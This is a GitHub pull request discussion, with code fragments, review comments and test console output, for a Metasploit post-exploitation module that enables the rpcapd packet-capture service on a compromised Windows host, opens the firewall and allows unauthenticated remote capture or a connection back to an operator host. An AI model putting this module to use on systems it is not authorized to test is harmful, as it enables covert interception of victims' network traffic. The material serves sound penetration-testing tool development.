
Post windows module to start rpcapd service (active/passive mode) #761

Merged
merged 3 commits into from Nov 28, 2012

3 participants

@BorjaMerino

The module enables the Remote Packet Capture System (rpcapd service) included in the default installation of Winpcap. The module allows you to set up the service in passive or active mode (useful if the client is behind a firewall).

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
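Review bot: `NULLAUTH` defaults to `true`, so the service is installed accepting captures without any credentials from anyone who can reach PORT; the module description itself says a local account is needed when authentication is on, so either default the option to `false` or state in its description that null authentication exposes the capture to unauthenticated clients. Also, in the description string, "depending of the mode configured" should read "depending on the mode configured".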
@jlee-r7
jlee-r7 added a note Sep 6, 2012

Modules should not run getsystem. Check for necessary privileges and tell the user if they need to run it.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
+ OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
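Review bot: `RHOST` is registered as optional (`false`) even though its own description says it is needed in active mode, and `run` starts with the privilege/platform check rather than validating the datastore; check `datastore['ACTIVE'] and datastore['RHOST'].nil?` first and `print_error` + `return` before touching the service, so a misconfigured run does not change the startup type and then fail. Minor: `'Local/Remote port to capture traffic.',2002` is missing the space after the comma.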
@jlee-r7
jlee-r7 added a note Sep 6, 2012

Artificial restriction. This is a fairly simple task that should work just fine on java or a shell session.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ print_good("Got System")
+ return true
+ else
+ print_error("Couldn't get System")
+ return false
+ end
+ elsif !is_admin? and datastore['GETSYSTEM']==false
+ return false
+ else # is_admin? = true
+ return true
+ end
+ end
+
+ def run_rpcapd(p)
+ begin
+ client.sys.process.execute("cmd.exe /c sc config rpcapd binpath= \"#{p}\" ",nil, {'Hidden' => 'true', 'Channelized' => true})
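Review bot: in `run_rpcapd`, `'Hidden' => 'true'` passes the string `'true'` while `'Channelized' => true` passes a boolean; use `true` for both. In `check_perm`, the `elsif !is_admin? and datastore['GETSYSTEM']==false` branch returns `false` without any message, so the user sees the module do nothing; add a `print_error` saying that administrative privileges are required, which also fits the earlier point that the module should tell the user rather than run getsystem itself.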
@jlee-r7
jlee-r7 added a note Sep 6, 2012

You should avoid process.execute when cmd_exec will do (i.e., unless you need to use a token). Using process.execute means this can't run on a shell session.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ print_status("Rpcapd is already running. Restarting service ...")
+ if service_stop("rpcapd") and service_start("rpcapd")
+ print_good("Service restarted successfully: #{p}")
+ else
+ print_error("There was an error restarting rpcapd.exe. Try to run it again")
+ end
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+
+ def fw_enable(prog)
+ print_status ("Enabling rpcapd.exe in Windows Firewall")
+ begin
+ if (client.fs.file.exists?(prog))
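Review bot: `rescue::Exception => e` (which should at least be written `rescue ::Exception => e`) swallows every exception, including interrupts and the Rex errors the framework expects to propagate; rescue the specific classes you expect from the service calls instead, and report them with `print_error` rather than `print_status`. Also `print_status ("Enabling rpcapd.exe in Windows Firewall")` has a space before the parenthesis, which Ruby warns about; write `print_status("Enabling rpcapd.exe in Windows Firewall")`.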
@jlee-r7
jlee-r7 added a note Sep 6, 2012

Use the methods from Post::File, which are platform and session type independent.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=client.fs.file.expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
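Review bot: `serv = service_info("rpcapd")` is dereferenced as `serv['Name']` without checking whether anything came back, so on a host without the service this may raise a `NoMethodError` instead of printing "This machine doesn't seem to have the rpcapd service"; guard it with `if serv.nil? or serv['Name'].to_s !~ /remote/i`. The call also happens before the "Checking if machine ... has rpcapd service" status line, so move it after that line so the output reflects what is happening.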
@jlee-r7
jlee-r7 added a note Sep 6, 2012

Use expand_path from the Post::File mixin instead.

@BorjaMerino

Hi @jlee-r7, thanks for all the explanations.

@jvazquez-r7

Tested successfully:

msf  exploit(handler) > use post/windows/manage/rpcapd_start 
msf  post(rpcapd_start) > show options

Module options (post/windows/manage/rpcapd_start):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.

msf  post(rpcapd_start) > show sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.1.129:4444 -> 192.168.1.147:1743 (192.168.1.147)

msf  post(rpcapd_start) > set SESSION 1
SESSION => 1
msf  post(rpcapd_start) > run

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed

After that I'm able to connect to the remote interface on port 2002 and capture traffic from a remote host.

@BorjaMerino

@jvazquez-r7 Thank you so much for checking it out

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 27, 2012
modules/post/windows/manage/rpcapd_start.rb
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+ if reg != 2
+ print_status("Setting rpcapd as 'auto' service")
+ service_change_startup("rpcapd","auto")
+ end
+ if datastore['ACTIVE']==true
+ print_error("RHOST is not set ") if datastore['RHOST']==nil
+ p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
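Review bot: `p = prog << " -d -a ..."` appends in place (`String#<<` mutates its receiver), so after this line `prog` itself carries the command-line arguments; if `prog` is used again afterwards, for example passed to `fw_enable`, whose `exists?` check expects a bare path, it is no longer the executable path. Use `p = "#{prog} -d -a #{datastore['RHOST']},#{datastore['PORT']} -v"` (or `prog + ...`) so `prog` stays untouched. The `print_error("RHOST is not set ")` line also needs a `return` after it; otherwise the module carries on and builds an `-a ,2002` argument from the nil RHOST.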
@jvazquez-r7
jvazquez-r7 added a note Nov 27, 2012

As @jlee-r7 has pointed out, it could happen that RHOST is nil. It doesn't seem to make sense when running in active mode, does it?

If RHOST is always needed to run in active mode, in case of RHOST being nil, just print_error to warn the user and return.

Thanks @jlee-r7 for keeping on pointing things out!

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 27, 2012
modules/post/windows/manage/rpcapd_start.rb
+ include Msf::Post::Windows::Registry
+ include Msf::Post::Windows::WindowsServices
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Enable Remote Packet Capture Service',
+ 'Description' => %q{
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
@jvazquez-r7
jvazquez-r7 added a note Nov 27, 2012

Can MSF_LICENSE be used? Or would you like to use BSD_LICENSE?

@BorjaMerino

@jvazquez-r7 yes, of course MSF_LICENSE. I was wrong to write it, and I've just seen that I also put BSD_LICENCE in the safe delete (sdel). Could you please change it?

Thank you

@jvazquez-r7

@bmerinofe sure I can change the license type for you when merging, no problem! :)

Is there any response for the comment about the RHOST being nil in the active mode? (see above :) )

@jvazquez-r7

Awesome, looks good and works as expected, merging!

msf  post(rpcapd_start) > show options

Module options (post/windows/manage/rpcapd_start):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.

msf  post(rpcapd_start) > set session 1
session => 1
msf  post(rpcapd_start) > rexploit
[*] Reloading module...

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed
msf  post(rpcapd_start) > set ACTIVE true
ACTIVE => true
msf  post(rpcapd_start) > rexploit
[*] Reloading module...

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[-] RHOST is not set 
[*] Post module execution completed

@jvazquez-r7 jvazquez-r7 merged commit cdd9eb1 into rapid7:master Nov 28, 2012

1 check passed: default (The Travis build passed)